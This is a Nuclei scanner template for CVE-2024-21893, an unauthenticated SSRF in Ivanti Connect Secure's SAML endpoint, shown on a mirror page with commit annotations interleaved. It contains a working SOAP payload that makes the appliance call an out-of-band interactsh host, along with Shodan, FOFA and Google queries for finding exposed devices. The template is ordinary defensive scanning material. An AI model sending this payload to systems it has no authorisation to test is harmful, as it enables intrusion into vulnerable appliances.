daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/cves/2024/CVE-2024-21893.yaml

58 lines
2.7 KiB
YAML
Raw Normal View History

Create CVE-2024-21893.yaml
2024-02-03 08:20:02 +00:00
id: CVE-2024-21893
info:
name: Ivanti SAML - Server Side Request Forgery (SSRF)
author: DhiyaneshDk
severity: high
description: |
A server-side request forgery vulnerability in the SAML component of Ivanti Connect Secure (9.x, 22.x) and Ivanti Policy Secure (9.x, 22.x) and Ivanti Neurons for ZTA allows an attacker to access certain restricted resources without authentication.
reference:
- https://attackerkb.com/topics/FGlK1TVnB2/cve-2024-21893/rapid7-analysis
- https://www.assetnote.io/resources/research/ivantis-pulse-connect-secure-auth-bypass-round-two
- https://github.com/advisories/GHSA-5rr9-mqhj-7cr2
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:
2024-03-23 09:28:19 +00:00
- https://github.com/Chocapikk/CVE-2024-21893-to-CVE-2024-21887
- https://github.com/Ostorlab/KEV
Create CVE-2024-21893.yaml
2024-02-03 08:20:02 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
cvss-score: 8.2
cve-id: CVE-2024-21893
cwe-id: CWE-918
Revert "TemplateMan Update [Mon Apr 8 11:30:07 UTC 2024] :robot:" This reverts commit 433dda4ae5b824564b44075bb95a96ecdbe263a6.
2024-04-08 11:34:33 +00:00
epss-score: 0.96249
epss-percentile: 0.9949
Create CVE-2024-21893.yaml
2024-02-03 08:20:02 +00:00
cpe: cpe:2.3:a:ivanti:connect_secure:9.0:-:*:*:*:*:*:*
metadata:
TemplateMan Update [Sat Mar 23 09:28:19 UTC 2024] :robot:
2024-03-23 09:28:19 +00:00
max-request: 1
Create CVE-2024-21893.yaml
2024-02-03 08:20:02 +00:00
vendor: ivanti
fix queries
2024-05-23 21:45:20 +00:00
product: connect_secure
TemplateMan Update [Fri Jun 7 10:04:28 UTC 2024] :robot:
2024-06-07 10:04:29 +00:00
shodan-query:
- "html:\"welcome.cgi?p=logo\""
- http.title:"ivanti connect secure"
- http.html:"welcome.cgi?p=logo"
fofa-query:
- body="welcome.cgi?p=logo"
- title="ivanti connect secure"
product/queries updated
2024-05-31 19:23:20 +00:00
google-query: intitle:"ivanti connect secure"
Create CVE-2024-21893.yaml
2024-02-03 08:20:02 +00:00
tags: cve,cve2024,kev,ssrf,ivanti
http:
- raw:
- |
POST /dana-ws/saml20.ws HTTP/1.1
Host: {{Hostname}}
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"> <soap:Body> <ds:Signature xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:SignedInfo> <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-c14n#"/> <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/> </ds:SignedInfo> <ds:SignatureValue>qwerty</ds:SignatureValue> <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/2000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#"> <ds:RetrievalMethod URI="http://{{interactsh-url}}"/> <ds:X509Data/> </ds:KeyInfo> <ds:Object></ds:Object> </ds:Signature> </soap:Body></soap:Envelope>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: word
part: body
words:
- '/dana-na/'
- 'WriteCSS'
condition: and
Auto Template Signing [Sat Jun 1 06:52:59 UTC 2024] :robot:
2024-06-01 06:53:00 +00:00
# digest: 490a00463044022027b9e6e74722d01d9812d29c2aeda9f8d8e2891891bacef19090cf225e7b43bd0220558c9cd77e216c8f6655742290f05d256049d8a020e84039644f22f3a4aa6601:922c64590222798bb761d5b6d8e72950